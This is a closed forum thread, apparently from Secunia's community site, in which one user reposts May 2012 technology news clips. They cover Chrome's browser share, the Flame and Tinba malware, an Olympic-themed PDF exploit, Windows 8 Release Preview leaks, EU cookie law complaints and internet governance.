For the month through Monday, Chrome had an average usage share of 32.5%, slightly higher than Internet Explorer's (IE) 32.1%, according to Irish company StatCounter.

If the remaining three days of May play out as did the previous 28, Chrome will take the browser crown from IE for a full month for the first time since Chrome's September 2008 launch.

Previously, Chrome had edged IE on weekends, and then earlier this month topped Microsoft's combined browser usage share for the week ending May 20. That trend continued in the month's fourth week as Chrome beat IE 32.9% to 31.4% for the seven days ending May 27.
The spread between the two browsers for the fourth week of the month was 67% larger than during the third week, hinting that Chrome continues to gain momentum in the share race.

Other browsers remained steady. Through May 28, Mozilla's Firefox accounted for 25.5% of all browsers used worldwide, while Apple's Safari and Opera Software's Opera logged in at 7.1% and 1.8%, respectively.

More at :-
http://www.computerworld.com/s/article/9227536/Chr...

--
Was this reply relevant?
+0
-0
mogs CClip 142
Expert Contributor 29th May, 2012 17:50
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Super-powerful Flame worm could take YEARS to dissect
By John Leyden

Posted in Business, 29th May 2012 13:11 GMT


Analysis The exceptionally complex Flame malware, this week found on numerous systems across the Middle East and beyond, is likely to take months if not years to analyse.

Early indications suggest that Flame is a cyber-espionage toolkit that has penetrated computers primarily, but not exclusively, in Iran and Israel. The worm may have been in circulation for at least two years (and perhaps much longer) but only hit the news on Monday following a series of announcements by security groups and antivirus firms.

Iran's National Computer Emergency Response Team published a warning about the data-stealing virus, promising an antidote: so far the malware has completely evaded detection by commercial antivirus scanners. Iranian researchers described the malware as a "close relation" to Stuxnet, the famously well-engineered nasty that sabotaged industrial control systems linked to Iran's controversial nuclear programme.

Kaspersky Lab said the UN International Telecommunication Union had alerted it to Flame and asked for help analysing the malware, which was believed to be wiping information from Middle Eastern computers. Kaspersky said the unusually large virus has been spreading since March 2010.

More at :-
http://www.theregister.co.uk/2012/05/29/flame_cybe...

--
Was this reply relevant?
+0
-0
mogs CClip 143
Expert Contributor 29th May, 2012 17:57
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
F-Secure warns of Olympic themed emails carrying malicious code

After it found an Olympics PDF affecting Adobe Reader and Acrobat

By Lee Bell

Source: The Inquirer (http://s.tt/1cU9s)

FINNISH SECURITY FIRM F-Secure has warned of the dangers of Olympic themed emails that contain links after it encountered a malicious Olympic Games schedule PDF file that affects older versions of Adobe Reader and Acrobat.

F-Secure researcher Sean Sullivan said in a blog post Monday that the malware was found "while mining our back end for documents which drop executables".

Sullivan told The INQUIRER, "Typically, for a PDF exploit what will happen for the person sitting at the computer screen is that Adobe Reader will launch, it will crash and then it will drop a back door infecting the machine, allowing access remotely. It will then launch a clean decoy as part of an attack."

In this case, the decoy is a copy of the London 2012 Olympic schedule circa October 2010.

He added, "The back door installs the software and connects back to home base. It could be someone out there trying to form his own botnet, turn the exploited machine into a zombie, into a bot."

The Olympic Games PDF exploit attempts to make a network connection with a site registered to "student travel" in Baotoushi, China.

Sullivan said the PDF exploits CVE-2010-2883 in the Cooltype.dll file in Adobe Reader and Acrobat version 9.x before 9.4 and 8.x before 8.2.5, on both Windows and Mac OS X operating systems.

Sullivan said if you don't already have the current version of Adobe Reader, you really should go get it now.

Last month, F-Secure's chief security researcher Mikko Hypponen warned that we are entering into a cyber warfare revolution, and that governments will soon attempt to outdo each other based on their computer weapons' prowess.

http://www.theinquirer.net/inquirer/news/2180482/-...

--
Was this reply relevant?
+0
-0
mogs CClip 144
Expert Contributor 29th May, 2012 21:04
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Consumer Reports: Free anti-malware software for Windows, Mac is effective
By Ellen Messmer | Network World US | 29 May 12

In what could be regarded as a controversial test of anti-malware effectiveness, the influential Consumer Reports publication in its June issue gives its main recommendation to anti-malware freeware for protecting Windows and Mac computers. With some caveats, Consumer Reports says in its "Security Software" article it regards it as unnecessary to buy commercial anti-malware software.

Consumer Reports says it carried out the testing of 18 separate anti-malware software applications -- four of them free and 14 paid -- in conjunction with International Consumer Research & Testing based on how well the software defended against live exploits from websites.

MORE: Free antivirus programs rise in popularity, survey shows

It combined these results with other tests related to "ease of use," as well as a measurement of how the software used memory or other "resources" that might slow computer operation during a scan. The testing also looked at "scan speed" related to how fast large groups of files could be scanned, and "updating" to see how fast each software package would be updated against new malware. Other categories such as "information help," related to how clear and useful instructions are, and "clear warnings" were examined. The effectiveness of any "firewall performance," "spam filter," "parental filter" and "non-boot rescue" were also technically reviewed by Consumer Reports and its testing partner.

In the June issue, Consumer Reports recommends that consumers use free anti-malware tools -- the top choice being Avira Free Antivirus, followed by AVG Anti-Virus Free 2012, Avast Free Antivirus and Microsoft Security Essentials, unless the user should be considered among the "most at-risk Internet users."

Read more: http://www.pcadvisor.co.uk/news/security/3360766/c...

--
Was this reply relevant?
+0
-0
mogs CClip 145
Expert Contributor 29th May, 2012 21:10
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft forbids class actions in new Windows licence

You're on your own now
By Gavin Clarke

Posted in Business, 29th May 2012 18:01 GMT
Microsoft will make it harder for customers to club together with lawyers to file lawsuits against its products.

The company is rolling out new End User License Agreements (EULAs) that forbid punters from joining class-action proceedings.

Assistant general counsel Tim Fielden announced the tweak here and said the changes will come into effect as Microsoft releases major hardware or software updates.

The first big product to include the altered licence will be Windows 8: a release candidate is expected in June before it ships for PCs and tablets in late summer or the autumn.

Read more at :-
http://www.theregister.co.uk/2012/05/29/no_microso...

--
Was this reply relevant?
+0
-0
mogs CClip 146
Expert Contributor 29th May, 2012 23:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Stable Channel Update for Chromebooks
Tuesday, May 29, 2012 | 12:21
The Google Chrome team is happy to announce the arrival of Chrome 19 to the Stable Channel for ChromeOS. More detailed updates are available on the Google Blog.

The Stable channel has been updated to 19.0.1084.52 (Platform version: 2046.107.0) for Chromebooks (Acer AC700, Samsung Series 5, Samsung Chromebook Series 5 550, and Samsung Chromebox Series 3). Machines will be receiving updates to this version over the next several days.

This build contains a number of new features, as well as security & stability improvements.

Some highlights of these changes are:
Entirely redesigned UI and updated Window Manager (Learn more).
New modes for multiple monitor handling: mirrored (highest common resolution only), show only on primary, show only on secondary (Switch with Ctrl + F5)
New open source trackpad stack
Updated Scratchpad app
New file types supported (Learn more)
Functional and visual refresh of the Chrome OS Settings
Recovery tool supports re-formatting recovery media (use a previous recovery image USB)
Introduced new Japanese fonts (Motoya G04 Gothic/Mincho).

If you find new issues, please let us know by visiting our help site or filing a bug. Interested in switching channels? Find out how. You can submit feedback using ‘Report an issue’ under the wrench menu.

Orit Mazor
Google Chrome

--
Was this reply relevant?
+0
-0
mogs CClip 147
Expert Contributor 30th May, 2012 20:52
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
1 in 5 U.S. Windows PCs lack antivirus defenses
Expired trial software accounts for more than a third of the 19.3% of American computers that browse naked

By Gregg Keizer
May 30, 2012 12:48 PM ETAdd a comment. What's this?
Computerworld - Nearly a fifth of Windows PCs in the U.S. lack any active security protection, an antivirus vendor said today, citing numbers from a year-long project.

"The scale of this is unprecedented," argued Gary Davis, the director of global consumer product marketing for McAfee, talking about the scope of his company's sampling of PC security.

McAfee took measurements from scans of more than 280 million PCs over the last 12 months, and found that 19.3% of all U.S. Windows computers browsed the Web sans security software. Owners of those systems downloaded and used McAfee's free Security Scan Plus, a tool that checks for antivirus programs and enabled firewalls.

Globally, the average rate was 17%, putting the U.S. in the top 5 most-unprotected countries of the 24 represented in the scans

More at :-
http://www.computerworld.com/s/article/9227570/1_i...

--
Was this reply relevant?
+0
-0
mogs CClip 148
Expert Contributor 30th May, 2012 20:58
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Windows 8 Release Preview leaks to Web
Appearance of Chinese 64-bit build may signal milestone release this week

By Gregg Keizer
May 30, 2012 06:39 AM ET
Computerworld - A Chinese edition of Windows 8, reportedly the same build that Microsoft will launch in the next week as the Release Preview, has leaked to file-sharing sites.

On Tuesday, links to Build 8400 of Windows 8 appeared on multiple sites and discussion forums, many of them Chinese-language destinations.

According to multiple reports on the Web, Build 8400 is legitimate and has successfully been installed by some users. "Canouna," the nickname used by an administrator of the WinLeaked forum, vouched for the download.

"100% LEGIT," Canouna tweeted early Tuesday.

Others, however, called the leak "a wild goose chase" because one widely shared link pointed to a corrupted file.

The only edition available Tuesday was the 64-bit version for Chinese users.

Microsoft has not disclosed the debut date of Windows 8 Release Preview -- the name for what the company has called "release candidate" in the past -- but has promised it would make the final public milestone available the first week of June.

More at :-
http://www.computerworld.com/s/article/9227565/Win...

--
Was this reply relevant?
+0
-0
mogs CClip 149
Expert Contributor 30th May, 2012 21:01
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Dev Channel Update
Tuesday, May 29, 2012 | 18:07
Labels: Dev updates
The Dev channel has been updated to 21.0.1155.2 for Windows, Mac, Linux, and Chrome Frame. This build contains following updates:

Updated V8 - 3.11.6.2
Gamepad API prototype http://www.w3.org/TR/gamepad/ available by default.
TLS 1.1 is enabled by default.
Mouse Lock (Pointer Lock) no longer requires fullscreen. [r138150][r138944] Native Client applications can use this now, while the JavaScript API still requires enabling in about:flags. Try e.g. http://media.tojicode.com/q3bsp/

Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

--
Was this reply relevant?
+0
-0
mogs CClip 150
Expert Contributor 30th May, 2012 21:09
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Kaspersky warns of worldwide implications of evolving Flame malware

Despite F-Secure saying it's not a concern for countries outside Iran
By Lee Bell
Tue May 29 2012, 18:23
SECURITY VENDOR Kaskpersky has warned that the world is not safe from malware like Flame, despite rival security firm F-Secure having said that it's "not a concern" for countries other than Iran.
The comments highlight how the security industry has conflicting opinions on the complex cyber espionage spyware that has targeted Iranian IT systems.
F-Secure researcher Sean Sullivan told The INQUIRER today that Flame is a "limited string, a special edition malware tool that doesn't get spotted in the wild, so if it was to spread... our automation would have picked it up". For this reason, he said, "It's not a concern for UK lands for certain."
However, Kaspersky's chief security expert told The INQUIRER that it's too early to say whether we are safe from the Flame cyber weapon even if it does appear to have been successfully stopped, because a new version could well evolve in the future.
"Flame has a model structure. This means once infected the operators can install additional models. So far we've found 20 different models but there may still be more yet to discover," he said.
"I think the people behind Flame spend every year deploying a new model. It's a huge operation with dozens of people involved - the same level as Stuxnet. I think such a successful cyber operation will create a new version."
Today it was also hinted by Israel's vice prime minister Moshe Ya'alon that it might have been involved in the Flame attack against Iran, according to reports.

Read more at :-
http://www.theinquirer.net/inquirer/news/2180718/k...

--
Was this reply relevant?
+0
-0
mogs CClip 151
Expert Contributor 30th May, 2012 21:15
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Trojan poses as privacy tool, spies on Iranian surfers

Looks like a popular free encrypted proxy tool
By John Leyden • Get more from this author

Posted in Malware, 30th May 2012 13:24 GMT
Backdoored versions of a widely used privacy tool have surfaced in Iran, raising fears that its government is using the Trojanised software to spy on its citizens.

A free encrypted proxy tool called Simurgh – official website https://simurghesabz.net – is used by many Iranians to circumvent locally applied net censorship technologies. Recently a Trojanised version of the tool (Simurgh-setup.zip) has begun appearing on file-sharing networks and wares sites.

The real software works as a standalone tool that can be run off a USB stick at locations such as cybercafes and other public internet access points. By contrast, the Trojanised version requires installation on a client PC. Thereafter, the software tracks user activities including keystrokes and websites visited. This data is then uploaded to US-based servers registered to a Saudi Arabian organisation, human rights activist group CitizenLab.org says.

More at :-
http://www.theregister.co.uk/2012/05/30/trojaned_p...

--
Was this reply relevant?
+0
-0
mogs CClip 152
Expert Contributor 30th May, 2012 21:21
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

May 30th, 2012, 14:47 GMT · By Ionut Arghire
Microsoft Offers Skype for OEMs to Preinstall on PCs

Ever since Microsoft acquired Skype, people have been wondering how the communication service and application would fit the company’s portfolio.

The Redmond-based software giant was mum so far on its plans to integrate the service with its other products, yet some info on the matter has already emerged.

Earlier this week, the company announced its OEM partners on the availability of Skype for integration with their computers.

“Enhance your Windows 7 installations with Skype,” Microsoft’s Steven Bink notes in a blog post announcing the availability of a Skype OPK.

The new Skype OPK arrives with capabilities similar to those packed inside any other OEM Preinstallation Kit (such as those available for Windows and Office).

It packs a wide range of technical info to offer OEMs the possibility to integrate it with their PCs in a multitude of scenarios.

The new OPK was released with all the tools and details required for deploying Skype 5.8. It comes with the installer application, as well as with instructions on what OEMs need to do to silently install it for their users.

Through including Skype in their PCs, OEMs ensure that customers benefit from a load of communication capabilities, including text, voice, video and the like.

With Skype preinstalled, users will take advantage of all the features already available through the standalone application and service:

Skype-to-Skype calls. Talk to anyone else on Skype, anywhere in the world, for free.
Video calling on Skype. Talk face to face with live video for free.
Instant messaging. Send an instant message to anyone on Skype, for free.
Call phones and mobiles. Call mobile phones or landlines anywhere in the world with Skype Credit—or save even more with a subscription.
Group video calling. Share, celebrate, and collaborate from anywhere in the world. There’s so much they can do together over group video.
Screen sharing. Share their screens with anyone on Skype for free, or share with a group of friends or colleagues using Skype Premium.

The Skype 5.8 OPK.img weighs 18MB and can be downloaded from Microsoft’s dedicated website for OEMs (registration required).

Microsoft is expected to make Skype available on more of its platforms as an integrated experience, including Xbox and Windows Phone. Windows 8 might also feature integration with the service, yet Microsoft hasn't confirmed it as of now.

http://news.softpedia.com/news/Microsoft-Offers-Sk...

--
Was this reply relevant?
+0
-0
mogs CClip 153
Expert Contributor 30th May, 2012 22:45
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Proposed new Internet neighborhoods unveiled June 13

May 30, 2012 by Glenn Chapman
The agency in charge of website addresses has picked June 13 as the day it will reveal proposed new names for online neighborhoods breaking the ".com" mold.

The Internet Corporation for Assigned Names and Numbers (ICANN) said in an online post that it will stop taking applications for Generic Top Level Domains at the end of Wednesday in the GMT time zone and reveal the requests in June.

In January, ICANN began taking applications from those interested in operating Internet domains that replace endings such as .com or .org with nearly any acceptable words, including company, organization or city names.

Outgoing ICANN president Rod Beckstrom has championed the change as a "new domain name system revolution."

The new system will allow Internet names such as .Apple or .IMF or .Paris.

ICANN says the huge expansion of the Internet, with two billion users around the world, half of them in Asia, requires the new names.

Registration costs $185,000 with a $25,000 annual fee after that.

ICANN has taken in more than $352 million in application fees, according to Beckstrom. There are more than 2,000 applications in ICANN's system.

"It is going to be very interesting on reveal day," Beckstrom said.

Read more at :-
http://phys.org/news/2012-05-internet-neighborhood...

--
Was this reply relevant?
+0
-0
mogs CClip 154
Expert Contributor 31st May, 2012 09:20
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Beta Channel Update
Wednesday, May 30, 2012 | 16:41
Labels: Beta updates

The Beta channel has been updated to 20.0.1132.21 for Windows, Mac, Linux, and Chrome Frame. This build contains updates to v8 (3.10.8.11) and fixes for bugs and stability. Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

--
Was this reply relevant?
+0
-0
mogs CClip 155
Expert Contributor 31st May, 2012 18:15
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
May 31st, 2012, 13:40 GMT · By Eduard Kovacs
Researchers Present Tinba, 20KB Trojan Banker

CSIS Security Group have discovered Tinba, what they believe to be “the world’s smallest Trojan-banker.” The malicious element belongs to a new malware family and it’s designed to steal sensitive information by attaching itself to the web browser and intercepting network traffic.

Before we explain how the 20 kilobyte Trojan works, we would like to refer to a clever observation made by F-Secure’s Chief Research Officer Mikko Hypponen regarding the size of Tinba compared to the one of Flame, the recently uncovered brother of Stuxnet and Duqu.

“To put Flame's size of 20MB into perspective, here's a full-blown banking trojan in 20kB. Flame is 1024 times larger,” he wrote on Twitter.

That being said, let’s take a look at what the Tiny Banker, also known as Zusy, can actually do and how it operates.

Similar to other banking Trojans, Tinba also utilizes webinjects and Man-in-the-Brower attacks in order to trick the potential victim into handing over transaction authentication numbers (TAN), two factor authentication codes, and other valuable details.

When executed, it uses an obfuscated injection routine that allows it to avoid being detected by security solutions. After that, it creates a new process called Version Reporter Applet (winvert.exe), which is located in the System folder.

However, that’s not the only process leveraged by Tinba. It also injects itself into processes such as svchost and explorer.

There are a number of 4 hardcoded domains used by the malware for communicating with its command and control servers. This allows it to continue operating even if one of the domains fails to respond.

In order to compromise the web browsers, the Trojan injects itself into processes like firefox.exe and iexplorer.exe, allowing it to manipulate network traffic through the web browser’s APIs.

“An interesting observation is the fact that Tinba will modify headers X-FRAME-Options thus being able to inject insecure non HTTPS supported elements from external servers/websites. Tinba, like its equals, targets financial websites, but only a very small list of specific URLs,” Peter Kruse, partner and security specialist at CSIS explained.

Finally, the expert also shares the same beliefs as Mikko Hypponen, stating that a piece of malware doesn’t necessarily have to be 20 megabytes in size to be effective.

http://news.softpedia.com/news/Researchers-Present...

--
Was this reply relevant?
+0
-0
mogs CClip 156
Expert Contributor 31st May, 2012 18:25
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft to ship Windows 8 Release Preview today
Goof leaks word of final public milestone's early launch

By Gregg Keizer
Computerworld - Microsoft will ship Windows 8 Release Preview today, several days earlier than expected, according to a blog briefly posted by the company.

The blog post, written by Chuck Chan, an executive with the Windows development team, went live for a few minutes late Wednesday, long enough for several users to take notice. Neowin first reported the leak of Chan's post and its Thursday date.

Earlier, Microsoft had promised to deliver the Release Preview the first week of June, a timeframe that most, including Computerworld, assumed meant the week of June 4-8. But the company must have thought differently, figuring that Friday, June 1, qualified this week as the month's first.

The late-May debut of Release Preview meshes with a schedule spelled out in March by Michael Cherry, an analyst with Directions on Microsoft, who said that the Redmond, Wash. developer would deliver the build three months after the Consumer Preview, with a "release to manufacturing," or RTM, edition three months later

More at :-
http://www.computerworld.com/s/article/9227597/Mic...

--
Was this reply relevant?
+0
-0
mogs CClip 157
Expert Contributor 31st May, 2012 18:32
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 31st May, 2012 18:32
Complaints over new cookie laws close to 100 following last minute amendments.
Complaints are already heading the way of the Information Commissioner's Office (ICO) regarding the EU's new continent-wide cookie laws, which came into force at the beginning of the week.
To date, 84 people have contacted the organisation, which is the UK's independent authority on data protection and information rights, to protest the new regulations, though the tone of the objections registered is not clear.
It seems most likely that people are upset specifically with the ICO for making last-minute alternations to the legislation enabling companies to assume some website users have given consent to have their details stored.
Some observers have argued that this loophole essentially negates the point of a cookie law in the first place, though it is also possible that Internet surfers are annoyed by the extra pop-ups coming their way as a result of the new requirements.
On 28 May, the rules governing how cookies employed for data capture purposes are flagged by containing websites were altered to reflect ongoing concerns about electronic invasions of privacy.
Companies who use the controversial but widespread technique of obtaining personal information and tracking online behaviour patterns on their sites are now required to inform web users of the practice and receive their consent.
An ICO spokesperson has indicated that the organisation has set up a survey on its website to encourage people to share their feelings about how cookies are managed in the digital world.
Read more: http://www.itproportal.com/2012/05/31/complaints-o...

--
Was this reply relevant?
+0
-0
mogs CClip 158
Expert Contributor 31st May, 2012 21:59
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 1st Jun, 2012 23:32
US rejects proposal to put Internet under UN control

The world is displayed on a computer screen via Google Earth. US officials, lawmakers and technology leaders offered a resounding "no" Thursday to proposals to bring the Internet under United Nations' control and said they would lead efforts to stop the move.

US officials, lawmakers and technology leaders voiced firm opposition Thursday to efforts to bring the Internet under UN control, saying it could hurt free expression and commerce.

At a congressional hearing, the comments were united in opposition to place the Internet under the jurisdiction of the International Telecommunications Union, a United Nations agency which governs telecom systems.

"There's a strong, bipartisan consensus within the (US) administration and Congress that we must resist efforts from some countries to impose a top-down governance of the Internet," Representative Henry Waxman told the hearing.

Congresswoman Doris Matsui added that "any international authority over the Internet is troublesome, particularly if that effort is being led by countries where censorship is the norm."

A top State Department official, in prepared remarks, reaffirmed the opposition of the Obama administration to UN governance of the Internet.

"In all bilateral encounters and multilateral meetings, the United States consistently opposes the extension of intergovernmental controls over the Internet," said Philip Verveer, deputy assistant secretary of state and coordinator for IT policy, saying this would lead to "very bad outcomes."

"It inevitably would diminish the dynamism of the Internet," he said.

Verveer told lawmakers that UN control would possibly "aid in censorship and repression" in some countries.

The comments come ahead of a meeting in December of the ITU where some nations will be pressing for the agency to formally govern the Internet.

Some nations, including Russia and China, say the Internet is still controlled by the United States and that a UN effort would give a greater voice to the developing world.

More at :-
http://phys.org/news/2012-05-internet.html

This thread is now closed....thankyou for your support

--
Was this reply relevant?
+0
-0

This thread has been marked as locked.


 Products Solutions Customers Partner Resources Company
 
 Corporate
Vulnerability Intelligence Manager (VIM)
Corporate Software Inspector (CSI)
Consumer
Personal Software Inspector (PSI)
Online Software Inspector (OSI)
 Industry
Compliance
Technology
Integration
 Customers
Testimonials
 VARS
MSSP
Technology Partners
References
 Reports
Webinars
Events
 About us
Careers
Memberships
Newsroom


 
© 2002-2014 Secunia ApS - Rued Langgaards Vej 8, 4th floor, DK-2300 Copenhagen, Denmark - +45 7020 5144
Terms & Conditions and Copyright - Privacy - Report Vulnerability